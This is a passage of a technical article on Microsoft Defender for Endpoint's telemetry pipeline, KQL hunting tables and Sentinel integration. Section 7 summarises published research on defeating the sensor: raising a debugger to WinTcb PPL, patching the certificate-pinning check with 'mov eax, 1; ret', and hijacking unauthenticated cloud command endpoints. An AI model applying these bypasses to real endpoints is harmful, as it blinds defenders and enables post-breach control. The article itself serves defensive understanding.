&quot;&lt;em&gt;Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure&lt;/em&gt;&quot; [@msrc-cve-2022-23278].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The kernel-and-Defender-Antivirus surface MDE shares (&lt;code&gt;WdBoot.sys&lt;/code&gt; ELAM, &lt;code&gt;WdFilter.sys&lt;/code&gt; minifilter, &lt;code&gt;WdNisDrv.sys&lt;/code&gt; NIS) is documented. The specific callback inventory the MDE EDR sensor itself registers is not. The community&apos;s best-published primary for what &lt;code&gt;MsSense.exe&lt;/code&gt; actually does is the FalconForce 2022 reverse-engineering writeup -- and it covers a narrow slice (TLS interception and one cloud-authorization bug), not a full callback list. The Hartong &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; config exists &lt;em&gt;as a community-curated artifact&lt;/em&gt; precisely because Microsoft has not published a per-&lt;code&gt;ActionType&lt;/code&gt;-to-per-kernel-callback cross-walk. The most-cited operational config in the field is downstream of a documentation gap. This is the second aha moment of the article.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Putting the on-host pieces together&lt;/h3&gt;

flowchart TD
    B[&quot;WdBoot.sys (ELAM, Antimalware EKU)&quot;] -.boot order.-&amp;gt; F[&quot;WdFilter.sys (file minifilter)&quot;]
    B -.boot order.-&amp;gt; N[&quot;WdNisDrv.sys (Network Inspection)&quot;]
    F --&amp;gt; M[&quot;MsSense.exe (Antimalware-PPL aggregator)&quot;]
    N --&amp;gt; M
    M --&amp;gt; IR[&quot;SenseIR.exe (Live Response)&quot;]
    M --&amp;gt; NDR[&quot;SenseNdr.exe (Network Detection)&quot;]
    M --&amp;gt; P[&quot;SenseCncProxy.exe (cloud forwarder)&quot;]
    P -- &quot;TLS + certificate pinning&quot; --&amp;gt; C[&quot;Defender XDR ingest (regional Kusto)&quot;]
&lt;p&gt;The picture is asymmetric: the kernel-driver substrate at the top is documented in the Defender Antivirus product line; the user-mode service inventory in the middle is documented for &lt;code&gt;MsSense.exe&lt;/code&gt; and partly documented for the companion binaries; the cloud transport at the bottom is documented at the API-contract level (TLS, certificate pinning) but the specific endpoints and the on-the-wire payload format are reverse-engineered. The community published primaries -- FalconForce 2022 above the line, InfoGuard Labs 2025 below it -- are how the field knows what they know about the cloud-bound payload. Which is the next layer.&lt;/p&gt;
&lt;h2&gt;7. The Cloud Pipeline: SenseCncProxy.exe to Defender XDR Ingest&lt;/h2&gt;
&lt;p&gt;The wire between &lt;code&gt;MsSense.exe&lt;/code&gt; and Microsoft&apos;s cloud is TLS with certificate pinning. It is also, twice in the last four years, the place where the most interesting Defender for Endpoint vulnerabilities have lived. The 2022 round closed one of them. The 2025 round is still open as of this article&apos;s writing.&lt;/p&gt;
&lt;h3&gt;Certificate pinning and the FalconForce 2022 method&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;MsSense.exe&lt;/code&gt; does not trust whatever the Windows certificate store says about the chain to Defender XDR ingest. It pins the certificate. FalconForce&apos;s bypass is the one §6 already named: raise &lt;code&gt;dbgsrv.exe&lt;/code&gt; to &lt;code&gt;WinTcb&lt;/code&gt; PPL, attach the elevated debug server to &lt;code&gt;MsSense.exe&lt;/code&gt;, instrument &lt;code&gt;SspiCli!EncryptMessage&lt;/code&gt; to capture the plaintext payload &lt;em&gt;before&lt;/em&gt; TLS encryption [@falconforce-2022].The specific PPL elevation technique is published in the same writeup. PPLKiller&apos;s &lt;code&gt;/enablePPL&lt;/code&gt; patch writes the Antimalware-PPL bit into &lt;code&gt;dbgsrv.exe&lt;/code&gt;&apos;s &lt;code&gt;_EPROCESS.Protection&lt;/code&gt; field at the highest signer level (&lt;code&gt;WinTcb&lt;/code&gt;). The result: a PE debug server running at a PPL level &lt;em&gt;above&lt;/em&gt; Antimalware-PPL, with &lt;code&gt;OpenProcess&lt;/code&gt; rights against any Antimalware-PPL target [@falconforce-2022]. This requires SYSTEM plus a kernel primitive, typically delivered via BYOVD.&lt;/p&gt;
&lt;p&gt;The InfoGuard Labs 2025 follow-up took a different route to the same problem. Instead of reading plaintext before TLS encryption, InfoGuard &lt;em&gt;patches&lt;/em&gt; the certificate-chain validation function in memory so the endpoint certificate is no longer checked at all. Any local TLS-stripping proxy can then intercept the wire. The verbatim patch is two CPU instructions written into &lt;code&gt;CRYPT32!CertVerifyCertificateChainPolicy&lt;/code&gt;: &quot;&lt;code&gt;mov eax, 1; ret&lt;/code&gt;&quot; -- which forces the function to return success without performing any actual chain check [@infoguard-2025].&lt;/p&gt;
&lt;p&gt;With the pinning gate disabled, InfoGuard&apos;s team observed the on-the-wire protocol. The cloud-bound payload goes to two endpoint families: &lt;code&gt;/edr/commands/cnc&lt;/code&gt; for command-and-control and &lt;code&gt;/senseir/v1/actions/&lt;/code&gt; for live-response actions. The vulnerability they then disclosed is that both endpoint families accept &quot;data sent from the MDE endpoint to the cloud ... without validating authentication tokens, allowing a post-breach attacker with a machine&apos;s ID to hijack the command-and-control channel&quot; [@infoguard-2025]. Microsoft&apos;s response, verbatim: &quot;&lt;em&gt;All findings were reported to the Microsoft Security Response Center (MSRC) in July 2025. However, Microsoft has classified them as low severity and has not committed to a fix&lt;/em&gt;&quot; [@infoguard-2025].&lt;/p&gt;

FalconForce 2022 found a missing-authorization bug in the cloud&apos;s trust path. CVE-2022-23278 was patched. InfoGuard Labs 2025 found a different missing-authorization pattern in different cloud endpoints -- different bug, same class -- and the disclosure record says Microsoft has not committed to a fix. The cloud trusts whatever the endpoint claims about itself far enough that the same authorization gap keeps surfacing. The arc that began with the March 2022 spoofing-CVE patch is not closed. This is the third aha moment of the article, surfaced again in §11.
&lt;h3&gt;What the cloud does on arrival&lt;/h3&gt;
&lt;p&gt;Once &lt;code&gt;SenseCncProxy.exe&lt;/code&gt; has TLS-shipped the event over the wire to the regional Defender XDR ingest endpoint, two things happen on the cloud side. First, the event lands in the Advanced Hunting Kusto cluster. Microsoft Learn&apos;s verbatim freshness claim is: &quot;&lt;em&gt;Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services&lt;/em&gt;&quot; [@advanced-hunting-overview]. &quot;Almost immediately&quot; is empirically a few seconds in steady state, which is exactly what Maya saw in §1: a row with &lt;code&gt;Timestamp&lt;/code&gt; three seconds in the past.&lt;/p&gt;
&lt;p&gt;Second, the event is replicated for use by Microsoft&apos;s built-in detection rules, MITRE-mapped queries, and the cross-domain correlation surface that joins endpoint events to email events, identity events, and cloud-application events. The cross-domain join is one of the most-cited reasons enterprises stay on the licensed product rather than fall back to standalone Sysmon: KQL can join &lt;code&gt;DeviceProcessEvents&lt;/code&gt; to &lt;code&gt;EmailEvents&lt;/code&gt; to &lt;code&gt;IdentityLogonEvents&lt;/code&gt; in one query, and Sysmon-only deployments cannot do that without a separate SIEM doing the cross-source enrichment.&lt;/p&gt;
&lt;p&gt;Data residency is documented at the regional level in the MDE configure-server-endpoints page: &quot;&lt;em&gt;data is stored in the US for customers in the USA; in EU for European customers; and in the UK for customers in the United Kingdom&lt;/em&gt;&quot; [@ms-server-endpoints-learn]. Retention in-portal is the same quota for all geographies: &quot;&lt;em&gt;Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data&lt;/em&gt;&quot; [@advanced-hunting-overview]. Past 30 days, the customer has to extend the retention surface via Microsoft Sentinel&apos;s per-table archiving, which is the operational story §9 picks up.&lt;/p&gt;
&lt;h3&gt;The event&apos;s journey, end to end&lt;/h3&gt;

sequenceDiagram
    participant K as Kernel callback (WdFilter or SysmonDrv)
    participant S as MsSense.exe (Antimalware-PPL)
    participant P as SenseCncProxy.exe
    participant CP as CRYPT32!CertVerifyCertificateChainPolicy
    participant C as Defender XDR ingest (regional Kusto)
    participant Q as DeviceProcessEvents table
    K-&amp;gt;&amp;gt;S: Synchronous callback notification
    Note over S: Enrich (parent PID, hashes, identity, ProcessGuid)
    S-&amp;gt;&amp;gt;S: SspiCli!EncryptMessage (FalconForce 2022 plaintext capture point)
    S-&amp;gt;&amp;gt;P: IPC to cloud forwarder
    P-&amp;gt;&amp;gt;CP: Validate Defender XDR certificate chain
    CP--&amp;gt;&amp;gt;P: Pinned chain OK (InfoGuard 2025 bypass: patch CP to return 0 unconditionally)
    P-&amp;gt;&amp;gt;C: HTTPS POST /edr/commands/cnc or /senseir/v1/actions/
    C-&amp;gt;&amp;gt;Q: Write into Kusto cluster
    Note over Q: &quot;Almost immediately&quot; -- seconds end to end
    Q--&amp;gt;&amp;gt;K: Queryable via KQL
&lt;p&gt;The diagram is annotated with the two community-disclosed interception points because they are the two places the field has actually been able to observe what is on the wire. Between &lt;code&gt;SspiCli!EncryptMessage&lt;/code&gt; (where the plaintext payload exists) and &lt;code&gt;CRYPT32!CertVerifyCertificateChainPolicy&lt;/code&gt; (where the certificate chain gets validated), the path is otherwise opaque to external researchers. The Microsoft-published side of the story is the contractual one: TLS, certificate pinning, regional ingest, Kusto cluster, KQL exposure. The reverse-engineered side fills in the rest.&lt;/p&gt;
&lt;p&gt;Within seconds, the event appears as a row in &lt;code&gt;DeviceProcessEvents&lt;/code&gt;. The reader-side schema is where the analyst lives. So: what columns?&lt;/p&gt;
&lt;h2&gt;8. Six &lt;code&gt;Device*&lt;/code&gt; Tables and One Worked KQL Query&lt;/h2&gt;
&lt;p&gt;Every detection rule in Microsoft Defender XDR, every hunting query in Microsoft Sentinel, and every analyst pivot Maya does on her console is a KQL query against six load-bearing tables. Knowing those six tables is the price of admission to the Defender XDR field.&lt;/p&gt;

Microsoft&apos;s data-explorer query language, originally built for Azure Data Explorer (formerly Kusto). KQL reads as a pipeline of operators -- `where`, `project`, `summarize`, `join`, `order by` -- left to right. Advanced Hunting in Microsoft Defender XDR and analytics queries in Microsoft Sentinel both expose the same KQL dialect; the same query text can be moved between the two surfaces with only the table-name namespace changing [@advanced-hunting-overview][@sentinel-xdr-connector].
&lt;h3&gt;The six tables&lt;/h3&gt;
&lt;p&gt;The six tables that this article calls &quot;load-bearing&quot; are the ones that map most cleanly to Sysmon&apos;s manifest and that detection rules join against most often:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;DeviceProcessEvents&lt;/code&gt;&lt;/strong&gt; -- the canonical reader-side analogue of Sysmon&apos;s EID 1 (ProcessCreate) and EID 5 (ProcessTerminate). The schema reference page names roughly fifty columns including &lt;code&gt;Timestamp&lt;/code&gt;, &lt;code&gt;DeviceId&lt;/code&gt;, &lt;code&gt;DeviceName&lt;/code&gt;, &lt;code&gt;ActionType&lt;/code&gt;, &lt;code&gt;FileName&lt;/code&gt;, &lt;code&gt;FolderPath&lt;/code&gt;, &lt;code&gt;SHA1&lt;/code&gt;, &lt;code&gt;SHA256&lt;/code&gt;, &lt;code&gt;MD5&lt;/code&gt;, &lt;code&gt;FileSize&lt;/code&gt;, &lt;code&gt;ProcessId&lt;/code&gt;, &lt;code&gt;ProcessCommandLine&lt;/code&gt;, &lt;code&gt;ProcessIntegrityLevel&lt;/code&gt;, &lt;code&gt;ProcessTokenElevation&lt;/code&gt;, &lt;code&gt;ProcessCreationTime&lt;/code&gt;, &lt;code&gt;AccountSid&lt;/code&gt;, &lt;code&gt;AccountName&lt;/code&gt;, &lt;code&gt;AccountUpn&lt;/code&gt;, &lt;code&gt;LogonId&lt;/code&gt;, and the full &lt;code&gt;InitiatingProcess*&lt;/code&gt; family of parent-process columns [@deviceprocessevents-table].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;DeviceNetworkEvents&lt;/code&gt;&lt;/strong&gt; -- the analogue of Sysmon EID 3 (NetworkConnect) plus EID 22 (DNSEvent) and the MDE-only network-protection telemetry. Columns include &lt;code&gt;RemoteIP&lt;/code&gt;, &lt;code&gt;RemotePort&lt;/code&gt;, &lt;code&gt;RemoteUrl&lt;/code&gt;, &lt;code&gt;LocalIP&lt;/code&gt;, &lt;code&gt;LocalPort&lt;/code&gt;, &lt;code&gt;Protocol&lt;/code&gt;, &lt;code&gt;RemoteIPType&lt;/code&gt;, and the &lt;code&gt;InitiatingProcess*&lt;/code&gt; family [@sentinel-xdr-connector].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;DeviceFileEvents&lt;/code&gt;&lt;/strong&gt; -- the analogue of Sysmon EIDs 11 (FileCreate), 15 (FileCreateStreamHash), 23 (FileDelete archived), and 26 (FileDeleteDetected).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;DeviceImageLoadEvents&lt;/code&gt;&lt;/strong&gt; -- the analogue of Sysmon EID 7 (ImageLoad).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;DeviceRegistryEvents&lt;/code&gt;&lt;/strong&gt; -- the analogue of Sysmon EIDs 12-14 (RegistryEvent family).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;DeviceEvents&lt;/code&gt;&lt;/strong&gt; -- the miscellaneous catch-all. &lt;a href=&quot;https://paragmali.com/blog/amsi-the-pre-execution-window-defender/&quot; rel=&quot;noopener&quot;&gt;AMSI&lt;/a&gt; scan results, exploit-protection events, ASR rule fires, Network Protection blocks, and other MDE-specific events that do not fit cleanly into any of the per-event-class tables surface here as &lt;code&gt;ActionType&lt;/code&gt; discriminators.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Past the six core tables there are siblings the article does not walk in detail but that detection engineers query alongside: &lt;code&gt;DeviceLogonEvents&lt;/code&gt; (interactive, remote-interactive, network logons), &lt;code&gt;DeviceFileCertificateInfo&lt;/code&gt; (Authenticode signer information), &lt;code&gt;DeviceInfo&lt;/code&gt; and &lt;code&gt;DeviceNetworkInfo&lt;/code&gt; (asset and posture). The cross-domain tables that the Defender XDR portal exposes -- &lt;code&gt;AlertInfo&lt;/code&gt;, &lt;code&gt;AlertEvidence&lt;/code&gt;, &lt;code&gt;IdentityLogonEvents&lt;/code&gt;, &lt;code&gt;EmailEvents&lt;/code&gt;, &lt;code&gt;CloudAppEvents&lt;/code&gt; -- are also queryable from the same surface, and the cross-domain join is one of the load-bearing reasons SOC teams move queries from a standalone SIEM into Advanced Hunting [@sentinel-xdr-connector].&lt;/p&gt;
&lt;h3&gt;Sysmon EID to MDE table cross-walk&lt;/h3&gt;
&lt;p&gt;The cross-walk is the table detection engineers actually need at their desk. Every row is a Sysmon EID, the MDE table the analogous event lands in, the &lt;code&gt;ActionType&lt;/code&gt; discriminator inside that table, and a fidelity rating relative to Sysmon&apos;s manifest -- because the MDE schema does &lt;em&gt;not&lt;/em&gt; surface every Sysmon field, and the fidelity gaps are where Hartong&apos;s MDE-augment config earns its keep.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Sysmon EID&lt;/th&gt;
&lt;th&gt;MDE table&lt;/th&gt;
&lt;th&gt;ActionType&lt;/th&gt;
&lt;th&gt;Fidelity vs Sysmon&lt;/th&gt;
&lt;th&gt;Hartong-augment disposition&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1 ProcessCreate&lt;/td&gt;
&lt;td&gt;DeviceProcessEvents&lt;/td&gt;
&lt;td&gt;ProcessCreated&lt;/td&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;Drop (MDE covers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3 NetworkConnect&lt;/td&gt;
&lt;td&gt;DeviceNetworkEvents&lt;/td&gt;
&lt;td&gt;ConnectionSuccess&lt;/td&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;Drop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7 ImageLoad&lt;/td&gt;
&lt;td&gt;DeviceImageLoadEvents&lt;/td&gt;
&lt;td&gt;ImageLoaded&lt;/td&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;Drop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8 CreateRemoteThread&lt;/td&gt;
&lt;td&gt;DeviceEvents&lt;/td&gt;
&lt;td&gt;RemoteThreadCreated&lt;/td&gt;
&lt;td&gt;Truncated (no SourceImage hash)&lt;/td&gt;
&lt;td&gt;Keep verbose&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9 RawAccessRead&lt;/td&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Omitted&lt;/td&gt;
&lt;td&gt;Keep&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10 ProcessAccess&lt;/td&gt;
&lt;td&gt;DeviceEvents&lt;/td&gt;
&lt;td&gt;OpenProcessApiCall&lt;/td&gt;
&lt;td&gt;Truncated (no GrantedAccess mask)&lt;/td&gt;
&lt;td&gt;Keep verbose, narrow targets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11 FileCreate&lt;/td&gt;
&lt;td&gt;DeviceFileEvents&lt;/td&gt;
&lt;td&gt;FileCreated&lt;/td&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;Drop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12-14 RegistryEvent&lt;/td&gt;
&lt;td&gt;DeviceRegistryEvents&lt;/td&gt;
&lt;td&gt;RegistryValueSet etc.&lt;/td&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;Drop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17-18 PipeEvent&lt;/td&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Omitted&lt;/td&gt;
&lt;td&gt;Keep&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;19-21 WmiEvent&lt;/td&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Omitted&lt;/td&gt;
&lt;td&gt;Keep&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;22 DNSEvent&lt;/td&gt;
&lt;td&gt;DeviceNetworkEvents&lt;/td&gt;
&lt;td&gt;DnsQuery&lt;/td&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;Drop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23 FileDelete (archive)&lt;/td&gt;
&lt;td&gt;DeviceFileEvents&lt;/td&gt;
&lt;td&gt;FileDeleted&lt;/td&gt;
&lt;td&gt;Partial (no archive)&lt;/td&gt;
&lt;td&gt;Keep archive variant on selected paths&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;26 FileDeleteDetected&lt;/td&gt;
&lt;td&gt;DeviceFileEvents&lt;/td&gt;
&lt;td&gt;FileDeleted&lt;/td&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;Drop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;27 FileBlockExecutable&lt;/td&gt;
&lt;td&gt;(none)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Omitted (MDE has separate prevent surface)&lt;/td&gt;
&lt;td&gt;Keep if Sysmon is enforcing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The fidelity column is the operational answer to &quot;do I need Sysmon if I have MDE?&quot; Where MDE is &lt;em&gt;Full&lt;/em&gt;, Sysmon duplicates. Where MDE is &lt;em&gt;Truncated&lt;/em&gt;, Sysmon adds the fields MDE drops. Where MDE is &lt;em&gt;Omitted&lt;/em&gt;, Sysmon is the only collection mechanism in the host&apos;s telemetry surface. This is the cross-walk that Hartong&apos;s &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; implements as XML rules.&lt;/p&gt;
&lt;h3&gt;The Kusto Hunt: PowerShell instances that called out within sixty seconds of spawn&lt;/h3&gt;
&lt;p&gt;The single most-frequently-cited hunting query in the Defender XDR field is some variation of the following. The query joins &lt;code&gt;DeviceProcessEvents&lt;/code&gt; to &lt;code&gt;DeviceNetworkEvents&lt;/code&gt; on &lt;code&gt;(DeviceId, InitiatingProcessId)&lt;/code&gt; and surfaces every PowerShell instance that opened an outbound network connection within sixty seconds of being spawned. This is the query that turns Maya&apos;s hunch (&quot;that base64-encoded command looks bad&quot;) into a SIEM-routable signal:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-kql&quot;&gt;// The Kusto Hunt: PowerShell instances that called out within
// 60s of process create, joined on (DeviceId, InitiatingProcessId).
DeviceProcessEvents
| where Timestamp &amp;gt; ago(24h)
| where FileName =~ &quot;powershell.exe&quot; or FileName =~ &quot;pwsh.exe&quot;
| project DeviceId, ProcessId, ProcessCreationTime = Timestamp,
          ParentImage = InitiatingProcessFileName,
          ParentCmd   = InitiatingProcessCommandLine,
          ProcessCmd  = ProcessCommandLine,
          User        = AccountUpn
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp &amp;gt; ago(24h)
    | where ActionType == &quot;ConnectionSuccess&quot;
    | project DeviceId, InitiatingProcessId, NetTime = Timestamp,
              RemoteIP, RemotePort, RemoteUrl
) on DeviceId, $left.ProcessId == $right.InitiatingProcessId
| where (NetTime - ProcessCreationTime) between (0s .. 60s)
| where RemoteIP !startswith &quot;10.&quot;
    and RemoteIP !startswith &quot;192.168.&quot;
    and not(RemoteIP matches regex &quot;^172\\.(1[6-9]|2[0-9]|3[0-1])\\.&quot;)
| project DeviceId, ProcessCreationTime, NetTime,
          ParentImage, ProcessCmd, RemoteIP, RemotePort, RemoteUrl, User
| order by NetTime desc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The query is twelve operative lines and exercises four of KQL&apos;s most useful primitives: &lt;code&gt;join&lt;/code&gt; (on a tuple key), &lt;code&gt;between&lt;/code&gt; (for time-window matching), &lt;code&gt;!startswith&lt;/code&gt; and the regex check (for RFC 1918 exclusion), and &lt;code&gt;project&lt;/code&gt; (for column shaping). The &lt;code&gt;between (0s .. 60s)&lt;/code&gt; is the crux. A legitimate PowerShell launched by a logon script may also produce a network connection within the same minute -- the filter is necessary but not sufficient. Adding &lt;code&gt;ParentImage in (&quot;winword.exe&quot;, &quot;excel.exe&quot;, &quot;outlook.exe&quot;)&lt;/code&gt; narrows the hunt to the Office-spawning-PowerShell pattern that fits the Emotet and Qbot families. Adding &lt;code&gt;RemoteUrl in (~CustomTI)&lt;/code&gt; narrows the hunt further to known-bad indicators from the tenant&apos;s threat-intelligence list.&lt;/p&gt;
&lt;p&gt;{`
// JavaScript that walks through the &lt;em&gt;logic&lt;/em&gt; of the KQL hunt.
// The actual query runs in Advanced Hunting; this runs in your browser
// so you can see the join semantics with a small synthetic dataset.&lt;/p&gt;
&lt;p&gt;const processEvents = [
  { DeviceId: &quot;D1&quot;, ProcessId: 7700, Timestamp: 100,
    FileName: &quot;powershell.exe&quot;,
    InitiatingProcessFileName: &quot;WINWORD.EXE&quot;,
    ProcessCommandLine: &quot;powershell.exe -enc JABzAD0A...&quot; },
  { DeviceId: &quot;D2&quot;, ProcessId: 4422, Timestamp: 200,
    FileName: &quot;powershell.exe&quot;,
    InitiatingProcessFileName: &quot;explorer.exe&quot;,
    ProcessCommandLine: &quot;powershell.exe -Help&quot; },
];&lt;/p&gt;
&lt;p&gt;const networkEvents = [
  { DeviceId: &quot;D1&quot;, InitiatingProcessId: 7700, Timestamp: 130,
    ActionType: &quot;ConnectionSuccess&quot;,
    RemoteIP: &quot;185.243.115.84&quot;, RemotePort: 443 },
  { DeviceId: &quot;D2&quot;, InitiatingProcessId: 4422, Timestamp: 215,
    ActionType: &quot;ConnectionSuccess&quot;,
    RemoteIP: &quot;10.0.0.5&quot;, RemotePort: 443 },
];&lt;/p&gt;
&lt;p&gt;function isPrivate(ip) {
  return ip.startsWith(&quot;10.&quot;)
      || ip.startsWith(&quot;192.168.&quot;)
      || /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip);
}&lt;/p&gt;
&lt;p&gt;const hits = [];
for (const p of processEvents) {
  if (!/^powershell\.exe$|^pwsh\.exe$/i.test(p.FileName)) continue;
  for (const n of networkEvents) {
    if (n.DeviceId !== p.DeviceId) continue;
    if (n.InitiatingProcessId !== p.ProcessId) continue;
    if (n.ActionType !== &quot;ConnectionSuccess&quot;) continue;
    const dt = n.Timestamp - p.Timestamp;
    if (dt &amp;lt; 0 || dt &amp;gt; 60) continue;
    if (isPrivate(n.RemoteIP)) continue;
    hits.push({ DeviceId: p.DeviceId,
                Parent:   p.InitiatingProcessFileName,
                Cmd:      p.ProcessCommandLine,
                RemoteIP: n.RemoteIP,
                Latency:  dt + &quot;s&quot; });
  }
}&lt;/p&gt;
&lt;p&gt;console.log(JSON.stringify(hits, null, 2));
// Expected output: one hit on D1 (WINWORD-spawned powershell to public IP);
// D2 is filtered out (RemoteIP is RFC 1918 private).
`}&lt;/p&gt;
&lt;p&gt;The semantic of the KQL is the semantic of the JavaScript: a relational join on a composite key, filtered by a time-window predicate and a network-class predicate. The KQL query is shorter and faster; the JavaScript is what the join is actually doing. Once a reader internalizes this pattern, the rest of the Advanced Hunting surface unfolds from it -- every other detection in the field is a variant of &quot;join &lt;code&gt;Device*&lt;/code&gt; table A to &lt;code&gt;Device*&lt;/code&gt; table B on &lt;code&gt;(DeviceId, InitiatingProcessId)&lt;/code&gt;, filter by time and content.&quot;Advanced Hunting per-query quotas are 100,000 rows of returned data and 10 minutes of execution time per call [@advanced-hunting-overview]. The practical workaround for queries that exceed either limit is to pre-filter with a tighter time window (&lt;code&gt;Timestamp &amp;gt; ago(1h)&lt;/code&gt; instead of &lt;code&gt;ago(24h)&lt;/code&gt;), or to push the heavy aggregation into a Sentinel scheduled analytics rule that runs every hour and materializes the result table for further hunting.&lt;/p&gt;
&lt;p&gt;The same query, the same columns, the same six tables surface in two different places: the Defender XDR portal itself (at &lt;code&gt;security.microsoft.com&lt;/code&gt; legacy or &lt;code&gt;defender.microsoft.com&lt;/code&gt; current), and inside Microsoft Sentinel via the Defender XDR connector. The two surfaces are not the same.&lt;/p&gt;
&lt;h2&gt;9. The Microsoft Sentinel Integration Model&lt;/h2&gt;
&lt;p&gt;The same KQL query runs in two different places, but the &lt;em&gt;economics&lt;/em&gt; of the two places are not the same, and that distinction is the one that catches detection engineers off guard. In-portal Advanced Hunting and Microsoft Sentinel both expose the same &lt;code&gt;Device*&lt;/code&gt; tables. They do not expose them with the same retention, the same join surface, or the same cost.&lt;/p&gt;
&lt;h3&gt;The connector contract&lt;/h3&gt;
&lt;p&gt;Microsoft Sentinel&apos;s &lt;strong&gt;Defender XDR connector&lt;/strong&gt; (the post-Ignite-2023 successor to the legacy Microsoft 365 Defender connector) streams Microsoft Defender XDR incidents, alerts, and Advanced Hunting events into Sentinel&apos;s Log Analytics workspace. Microsoft Learn&apos;s verbatim definition is: &quot;&lt;em&gt;The Defender XDR connector allows you to stream all Microsoft Defender XDR incidents, alerts, and advanced hunting events into Microsoft Sentinel and keeps incidents synchronized between both portals&lt;/em&gt;&quot; [@sentinel-xdr-connector]. The connector exposes per-table streaming, meaning the operator picks which &lt;code&gt;Device*&lt;/code&gt; tables to bring into Sentinel and pays per-GB ingestion only on those tables.&lt;/p&gt;
&lt;p&gt;The connector also handles the legacy-connector transition: when enabled, &quot;&lt;em&gt;any Microsoft Defender components&apos; connectors that were previously connected are automatically disconnected in the background&lt;/em&gt;&quot; [@sentinel-xdr-connector]. If a tenant was using the legacy Microsoft Defender ATP connector or per-product Defender connectors, those get retired when the unified Defender XDR connector takes over. This is the cleanup detail that catches teams off guard during the migration -- they expect both connectors to coexist for the transition window, and they do not.&lt;/p&gt;
&lt;h3&gt;Three asymmetries&lt;/h3&gt;
&lt;p&gt;The in-portal Advanced Hunting surface and the Sentinel surface differ on three practitioner-level axes:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;In-portal Advanced Hunting&lt;/th&gt;
&lt;th&gt;Sentinel + Defender XDR connector&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Retention&lt;/td&gt;
&lt;td&gt;30 days of raw data per query [@advanced-hunting-overview]&lt;/td&gt;
&lt;td&gt;Configurable per-workspace, up to 12 years archive [@sentinel-xdr-connector][@ms-log-analytics-archive]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Query surface&lt;/td&gt;
&lt;td&gt;Six core &lt;code&gt;Device*&lt;/code&gt; tables plus cross-domain &lt;code&gt;AlertInfo&lt;/code&gt; / &lt;code&gt;EmailEvents&lt;/code&gt; / &lt;code&gt;IdentityLogonEvents&lt;/code&gt; / &lt;code&gt;CloudAppEvents&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Six core &lt;code&gt;Device*&lt;/code&gt; tables (per-table selection) plus the entire Log Analytics workspace -- third-party logs, custom tables, ASIM-normalized data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost&lt;/td&gt;
&lt;td&gt;Included with MDE Plan 2 license&lt;/td&gt;
&lt;td&gt;Per-GB Sentinel ingestion (current GA tier) plus per-GB archive&lt;/td&gt;
&lt;/tr&gt;
